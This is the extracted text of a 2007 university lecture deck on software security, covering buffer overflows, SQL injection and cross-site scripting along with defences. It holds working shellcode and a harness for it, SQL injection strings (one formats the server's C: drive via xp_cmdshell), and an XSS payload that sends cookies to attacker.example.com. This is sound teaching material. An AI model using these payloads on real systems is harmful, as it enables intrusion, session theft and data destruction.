April 26, 2007 Centre College: Software Security

April 26, 2007 Centre College: Software Security

Software SecurityHave You Ever Written a Security

Bug?

http://www.nku.edu/


Charles Frank

• Department of Computer Science

• Northern Kentucky University

• [email protected]

• http://www.nku.edu/~frank

mailto:[email protected]

http://www.nku.edu/~frank

http://www.nku.edu/


What We Don’t Know

“Have you ever written a program section with a security hole? How do you know?”

Mark G. Graff & Kenneth R. van Wyk

http://www.nku.edu/


A Growing Problem

1995 1996 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006

0

1000

2000

3000

4000

5000

6000

7000

8000

9000

Software Vulnerabilities

Year

Vu

lne

rab

iliti

es

http://www.nku.edu/


Traditional Security is Reactive

• Perimeter defense (firewalls)

• Intrusion detection• Over-reliance on

cryptography• Penetrate & patch• Penetration testing

http://www.nku.edu/


What is web application security?

It’s more than just cryptography.– SSL won’t solve all your problems.

It’s more than securing the web server.– Web applications have their own problems.

It’s more than application firewalls.– Firewall can’t know every safe action at every

possible state in your application.

http://www.nku.edu/


Firewalls don’t protect web apps

Firewall

Port 80HTTP Traffic

WebClient

WebServer

Application

Application

DatabaseServer

http://www.nku.edu/


Penetrate and Patch

Discover flaws after deployment.Often by attackers.

Users may not deploy patches.

Patches may have security flaws (15%?)

Patches are maps to vulnerabilities.Attackers reverse engineer to create attacks.

http://www.nku.edu/


Penetrate-and-Patch Approach

http://www.nku.edu/


The Problem is Software

“We wouldn’t have to spend so much time and effort on network security if we didn’t have such bad software security”

Bruce Schneier“Applied Cryptography”

“Secrets & Lies: Digital Security in a Networked World”

http://www.nku.edu/


Hackers

“Malicious hackers don’t create security holes; they simply exploit them. Security holes and vulnerabilities – the real root cause of the problem – are the result of bad software design and implementation.”

John Viega & Gary McGraw

http://www.nku.edu/


Developers Aren’t Ready

“64% of developers are not confident in their ability to write secure applications”

Bill Gates, RSA 2005

http://www.nku.edu/


Industry Problem

• There is no software liability – no incentive for secure software

• Most developers never learned to produce secure code

• Because of competition and cost considerations, software is produced under severe time constraints.

http://www.nku.edu/


Developer’s Education

• Most programming courses ignore secure software development

• Most software engineering courses ignore secure software engineering

http://www.nku.edu/


Complexity

• Software products are growing in size• Windows XP has 40 million lines of code• 5-50 bugs per KLOC• 10% of bugs result in security faults• 40,000KLOC*5*10% = 25,000 security bugs• Software is often written in low level

languages such as C/C++

http://www.nku.edu/


Security Problems

SECURITY BUGS

50%

• Buffer overflow

• Command injection

• Cross-site scripting

• Integer overflow

• Race condition

• Untrusted input

ARCHITECTURAL FLAWS

50%

• Cryptography misuse

• Lack of compartmentalization

• More privilege than necessary

• Relying on secret algorithms

• Sharing resources

• Usability problems

http://www.nku.edu/


Essential Facts

Software Security ≠ Security FeaturesCryptography will not make you secure.

Application firewalls will not provide security.

50/50 Architecture/Coding Problems

An Emergent Property of SoftwareLike Usability or Reliability

Not a Feature

http://www.nku.edu/


Software Security Practices

1. Code Reviews

2. Risk Analysis

3. Penetration Testing

SecurityOperations

Requirements Design Coding Testing Maintenance

RiskAnalysis

AbuseCases

Code Reviews +Static Analysis

PenetrationTesting

SecurityTesting

4. Security Testing

5. Abuse Cases

6. Security Operations

http://www.nku.edu/


Vulnerability Trends for 2006

http://www.nku.edu/


Software Vulnerabilities1. Malicious Client2. Buffer Overflow3. SQL Injection4. Cross-site Scripting5. Format String6. Race Condition7. Information Leakage8. Path Traversal9. Command Injection10. Integer Overflow11. PHP Include

http://www.nku.edu/


Malicious Client

• Developers can mistakenly trust data from a client in server-side code

• Attackers can advantage of this trust

• Security tester’s job is to violate the data specifications to find security vulnerabilities

http://www.nku.edu/


Manipulate Network Requests

• Write a client to send custom requests– Might modify the client code to send malformed

requests

• Use a proxy to receive network traffic from a client and modify it to send it to the server.– Foxfire Add-on “Tamper Data”– WebScarab from OWASP

http://www.nku.edu/


Tamper Data

• Firefox Browser Add-on

• Google for Tamper Data

• Tools | Tamper Data

http://www.nku.edu/


Tamper Data

http://www.nku.edu/


Tamper Data

http://www.nku.edu/


Buffer Overflow Topics

1. What is a Buffer Overflow?

2. Buffer Overflow Examples

3. Program Stacks

4. Smashing the Stack

5. Shellcode

6. Mitigations

http://www.nku.edu/


Buffer OverflowsA program accepts too much input and stores it in a fixed length buffer that’s too small.

char A[8];short B;

A A A A A A A A B B

0 0 0 0 0 0 0 0 0 3

A A A A A A A A B B

o v e r f l o w s 0

gets(A);

http://www.nku.edu/


Buffer Overflow Examples

Morris WormTook down most of Internet in 1988.

Exploited a buffer overflow in fingerd.

Subsequent worms used overflow attacks too.

MS07-004: Internet ExplorerBuffer overflow in VML.

Allows remote code execution.

Not the first overflow in IE or other browsers.

http://www.nku.edu/


Buffer Overflow Example #1What’s the mistake in this program?

int main() {

int array[5] = {1, 2, 3, 4, 5}; printf("%d\n", array[5]);

}

Program output:

> gcc -o buffer buffer.c

> ./buffer7077876

http://www.nku.edu/


Buffer Overflow Example #2Writing beyond the buffer:

int main() { int array[5] = {1, 2, 3, 4, 5}; int i;

for( i=0; i <= 255; ++i ) array[i] = 41;}

Program output: > gcc -o bufferw bufferw.c> ./bufferwSegmentation fault (core dumped)

http://www.nku.edu/


What happened to our program?

The buffer overflow:Overwrote memory beyond buffer with 41.

Memory page was not writable by program.

OS terminated prog with segmentation fault.

Do overflows always produce a crash?Most of the time, yes.

Careful attacker can access valid memory.

http://www.nku.edu/


Why do programmers keep making the same mistake?

C/C++ inherently unsafe.

No bounds checking.

Unsafe library functions: strcpy(), sprintf(), gets(), scanf(), etc.

Java, Python largely immune.C/C++ gains performance by not checking.

http://www.nku.edu/


Stack at Function Start

Frame Pointer

Stack Pointer

old stack frame

parameter #N

…

parameter #1

return address

old FP

local vars

http://www.nku.edu/


Shellcode

Shellcode is machine code that starts a command shell. With a shell, you can run any command.

http://www.nku.edu/


ShellcodeShellcode in C.

int main() { char *name[2]; name[0] = "/bin/sh"; name[1] = 0x0; execve(name[0], name, 0x0);}

Running the program.> gcc –ggdb –static –o shell shellcode.c> ./shellsh-3.00$ exit

http://www.nku.edu/


From C to Machine Languagechar shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b""\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd""\x80\xe8\xdc\xff\xff\xff/bin/sh";

void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode;}

> gcc -o testsc2 testsc2.c> ./testsc2sh-3.00$ exit

http://www.nku.edu/


Writing an Exploit

1. Construct shellcode to inject.2. Find exploitable buffer in a program.3. Estimate address of buffer.4. Run program with an input that:

1. Injects shellcode into stack memory.2. Overwrites return address with address of your

shellcode.

http://www.nku.edu/


Compiler Defenses: Canaries

Goal: Detect altered return addresses.

Method: Compiler changes stack layout.Adds canary to stack when function called.

Must overwrite canary to change return addr.

Checks canary before function returns.

Terminate program if canary modified.

Canaries are random to prevent guessing.

Visual Studio 2005 and gcc 4.1 use canaries.

http://www.nku.edu/


Canary Stack Layout

old frame

param2

param1

return address

saved EBP

canary value

local vars

http://www.nku.edu/


Buffer Overflow: Key Points

Buffer overflow attacks.– C/C++ perform no bounds checking.– There is no difference btw code and data.– Smashing the stack.

Mitigating buffer overflows.– Use a language with bounds checking.– Check your own bounds in C/C++.– Use safe functions, string libraries.

http://www.nku.edu/


SQL Injection1. App sends form to user.2. Attacker submits form

with SQL exploit data.3. Application builds string

with exploit data.4. Application sends SQL

query to DB.5. DB executes query,

including exploit, sends data back to application.

6. Application returns data to user.

Attacker

Web Server DB Server

Firewall

User

Pass

‘ or 1=1--

http://www.nku.edu/


SQL Injection in PHP

$link = mysql_connect($DB_HOST, $DB_USERNAME, $DB_PASSWORD) or die ("Couldn't connect: " . mysql_error());

mysql_select_db($DB_DATABASE);

$query = "select count(*) from users where username = '$username' and password = '$password'";

$result = mysql_query($query);

http://www.nku.edu/


SQL Metacharacters‘ quotes parameters

; separates commands

-- comments

%, _ glob in LIKE clause

%, _, *, +, |, [], () used for regular expressions in SIMILAR TO clause

http://www.nku.edu/


SQL Injection Attack #1

Unauthorized Access Attempt:password = ’ or 1=1 --

SQL statement becomes:select count(*) from users where username =

‘user’ and password = ‘’ or 1=1 --

Checks if password is empty OR 1=1, which is always true, permitting access.

http://www.nku.edu/


SQL Injection Attack #2

Database Modification Attack:password = foo’; delete from table users

where username like ‘%

Database executes two SQL statements:select count(*) from users where username =

‘user’ and password = ‘foo’

delete from table users where username like ‘%’

http://www.nku.edu/


Impact of SQL InjectionSELECT SSN FROM USERS WHERE UID=‘$UID’

INPUT RESULT

5 Returns info for user with UID 5.

‘ OR 1=1-- Returns info for all users.

‘ UNION SELECT Field FROM Table WHERE 1=1--

Returns all rows from another table.

‘;DROP TABLE USERS--

Deletes the users table.

‘;master.dbo.xp_cmdshell ‘cmd.exe format c: /q /yes’ --

Formats C: drive of database server if you’re running MS SQL Server and extended procedures aren’t disabled.

http://www.nku.edu/


Solution: Prepared Queries

require_once 'MDB2.php';

$mdb2 =& MDB2::factory($dsn, $options);

if (PEAR::isError($mdb2)) {

die($mdb2->getMessage());

}

$sql = “SELECT count(*) from users where username = ? and password = ?”;

$types = array('text', 'text');

$sth = $mdb2->prepare($sql, $types, MDB2_PREPARE_MANIP);

$data = array($username, $password);

$sth->execute($data);

http://www.nku.edu/


Cross Site Scripting Attacks (XSS)

• Run Javascript in the victim’s browser– <script>alert(‘XSS’);</script>

• Get the user’s cookie for the Web site to display – perhaps revealing the session ID– <script>alert(document.cookie);</script>

• Steal the cookie and hijack the user’s session– Craft a request to the attackers machine with the cookie as

part of the file name, e.g. for an image source.

http://www.nku.edu/


Reflected XSS Attacks

Server side code takes script in user input and echoes the script back to run on the user machine.

http://www.nku.edu/


Example

http://server/search.aspx?keyword=<SCRIPT> alert(“Running!)</SCRIPT>

<BODY><H1>Search Results</H1>for =<SCRIPT> alert(“Running!)</SCRIPT><h2>Sorry, no results were found for.</h2>

http://www.nku.edu/


Exploiting an XSS Bug

• Attacker must trick the user into running the URL with the query string.

• Send a user an email with a link to a Web site

• http://server/search.aspx?keyword=<SCRIPT>document.location=“http://attacker.example.com/default.aspx?%2Bescape(document.cookie);”</SCRIPT>

http://www.nku.edu/


Anatomy of an XSS Attack

1. Login

2.

Cookie

Web Server

3. XSS Attack

Attacker User

4. User clicks on XSS link.

5. XSS URL

7. Browser runs injected code.

Evil Site saves cookie.

8. Attacker uses stolen cookie to hijack user session.

6. Page with injected code.

http://www.nku.edu/


Exploiting POST<body><% dim strName: strName = Request.Form("myName") if strName = "" then %> <form method="POST" name="myForm"> Name: <input type="text" name="myName"> <input type="submit" value="Submit"> </form></body></html> <% Response.End Else Response.Write "Hello, " & strName & ". Nice to meet you." End If%></body>

http://www.nku.edu/


What should we enter for Name?

<SCRIPT>alert(‘XSS!’)</SCRIPT>

http://www.nku.edu/


Getting the Victim to Submit Malicious POST

Attackers can trick victims into sending the script data in the POST by hosting the form that asks for the user’s name on the attacker’s Web site. The attacker can pre-populate the Name field with the script that exploits the XSS vulnerability.

http://www.nku.edu/


Testing

• Save the Web page to your site.

• <form method=“POST” name=“myForm” action=http://VulnerableWebSite/helloPostDemo.asp>

• <input type=“text” name=“myName” value=“<SCRIPT>alert(‘Hi!’)&lt/SCRIPT>”>

http://vulnerablewebsite/helloPostDemo.asp

http://www.nku.edu/


Automatically Submitting

<body>

….

<SCRIPT>Form.submit();</SCRIPT>

http://www.nku.edu/


Persistent XSS Attack

• Put <script>alert(‘Hi!’)</script> into a guestbook entry.

• View the guestbook entries page again.

http://www.nku.edu/


Stopping XSS Attacks

• Encode HTML of attacker’s input before returning it to the browser.

• Problem: Blogs may want users to use HTML. Block the script tag?

Original

Character

HTML

Encoded

< <

> >

& &

“ "

http://www.nku.edu/


Events

• Most tags have events

<INPUT name=“txtInput2” type=“text” value = ‘ OurData’ onclick=alert(‘Hi’) junk=‘’>

• When the user clicks on the text box the onclick event will fire.

http://www.nku.edu/


Microsoft ASP.NET

• When ValidateRequest property is enabled, the query string and POST data are inspected.

• Suspicious data, such as <script> and onload=, cause an exception to be thrown.

http://www.nku.edu/


Identifying XSS Vulnerabilities

1. Identify where user data is supplied.

2. Send valid-looking data to the application.

3. Verify whether any of the data is returned to the Web browser.

4. Find ways to force the victim to send data and have it run as a script on the client machine.

http://www.nku.edu/


Knowledge

SPI Dynamic White papers– http://www.spidynamics.com/spilabs/education/wh

itepapers.html

– Blind SQL Injection– Cross Site Scripting

http://www.spidynamics.com/spilabs/education/whitepapers.html

http://www.spidynamics.com/spilabs/education/whitepapers.html

http://www.nku.edu/


OWASP Web Goat

Teaches Web application security through a series of lessons.

http://www.owasp.org/index.php/OWASP_WebGoat_Project

Lesson Planshttp://www.owasp.org/index.php/Lesson_Plans



http://www.owasp.org/index.php/Lesson_Plans

http://www.nku.edu/


Going Further

http://www.nku.edu/

Date post:	18-Nov-2014
Category:	Documents
Upload:	softwarecentral
View:	2,352 times
Download:	2 times

April 26, 2007 Centre College: Software Security

Documents